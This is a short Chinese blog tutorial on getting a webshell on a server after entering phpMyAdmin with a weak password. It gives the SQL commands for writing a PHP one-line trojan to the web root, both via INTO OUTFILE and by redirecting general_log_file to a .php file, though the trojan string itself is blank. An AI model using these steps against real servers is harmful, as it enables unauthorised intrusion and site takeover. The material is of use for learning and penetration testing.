【Web安全】拿到phpMyAdmin如何获取权限

文章目录

      • 1、outfile写一句话
      • 2、general_log_file写一句话

通过弱口令拿到进到phpMyAdmin页面如何才能获取权限

1、outfile写一句话

尝试执行outfile语句写入一句话木马

select ""  into outfile "C:\\phpStudy\\WWW\\phpadmin.php";

【Web安全】拿到phpMyAdmin如何获取权限_第1张图片

【Web安全】拿到phpMyAdmin如何获取权限_第2张图片

如果执行失败show variables like "%secure%"; 查看配置

【Web安全】拿到phpMyAdmin如何获取权限_第3张图片

2、general_log_file写一句话

查看general_log是否开启

通过show global variables like "%genera%";查看

【Web安全】拿到phpMyAdmin如何获取权限_第4张图片

执行set global general_log="on";打开

通过generali_log_file写入一句话木马

set global general_log_file=“网站绝对路径/文件名”;

【Web安全】拿到phpMyAdmin如何获取权限_第5张图片

SELECT ""

【Web安全】拿到phpMyAdmin如何获取权限_第6张图片

general_log_file会记录所有的查询语句,以原始的状态来显示,如果将general_log开关打开,general_log_file设置为一个php文件,则查询的操作将会全部写入到general_log_file指定的文件,通过访问general_log_file指定的文件来获取webshell。

【Web安全】拿到phpMyAdmin如何获取权限_第7张图片

你可能感兴趣的:(#,Web安全,web安全,android,安全)